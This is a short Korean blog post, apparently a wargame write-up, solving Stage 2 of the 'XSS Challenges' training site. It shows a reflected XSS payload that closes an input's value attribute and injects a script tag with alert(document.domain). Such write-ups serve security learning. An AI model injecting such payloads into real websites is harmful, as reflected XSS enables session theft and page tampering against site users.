-
[XSS Challenges] Stage #2 
이번 문제는 스테이지 1에서 썻던 방법이 먹히지 않는다.
검색창에 입력하면 그 값이 그대로 value에 들어가는 걸 알 수 있다.
태그를 닫고 다시 스크립트 태그를 열어 alert()를 삽입한다면 <script>alert()</script> 구문이 브라우저에서 실행되어 성공하게 된다.
"><script>alert(document.domain)</script><"문제의 정답 코드는 위와 같다.
정답 코드를 삽입하면 브라우저는
<input type="text" name="p1" size="50" value=""><script>alert(document.domain)</script><"">
와 같이 실행하게 된다.
Stage #2 Clear https://xss-quiz.int21h.jp/stage2.php
'Wargame > XSS Challenges' 카테고리의 다른 글
[XSS Challenges] Stage #6 (0) 2022.02.16 [XSS Challenges] Stage #5 (0) 2022.02.15 [XSS Challenges] Stage #4 (0) 2022.02.14 [XSS Challenges] Stage #3 (0) 2022.02.14 [XSS Challenges] Stage #1 (0) 2022.02.13 댓글
HACKINTOANETWORK
SECURITY RESEARCHER, BUG HUNTER, HACKER
